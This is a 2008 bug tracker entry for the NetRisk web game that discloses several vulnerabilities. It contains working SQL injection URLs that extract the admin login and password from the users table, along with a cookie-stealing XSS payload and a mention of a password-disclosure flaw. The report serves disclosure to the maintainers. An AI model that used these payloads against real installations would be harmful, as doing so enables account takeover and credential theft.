Share

NetRisk

Tracker: Bugs

5 sql injection, xss attack and password vulnerability - ID: 1907625
Last Update: Settings changed ( ptmuldoon )

http://www.secumania.org/exploits/web-applications/netrisk-1.9.7-%28xss_sql
%29-multiple-remote-vulnerabilities-2008010638553/

1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1
,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1
,2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
########################
2.xss:
http://site.com/patch/index.php?page=<script>alert(document.cookie)</script
>

########################
NetRisk contains other sql injecton/xss/LFI bugs in other pages

Also:
http://www.secumania.org/security/vulnerabilities/netrisk-%27change_submit.
php%27-password-information-disclosure-vulnerability-2008010538971/

\'change_submit.php\' Password Information Disclosure Vulnerability

netRisk is prone to an information-disclosure vulnerability because it
fails to sanitize user-supplied input before using it to provide
authentication credentials.


Nobody/Anonymous ( nobody ) - 2008-03-05 03:16

5

Closed

None

Nobody/Anonymous

None

None

Public


Comments




Log in to comment.

No follow-up comments have been posted.

Attached File

No Files Currently Attached

Changes ( 2 )

Field Old Value Date By
status_id Open 2008-07-30 18:45 ptmuldoon
close_date - 2008-07-30 18:45 ptmuldoon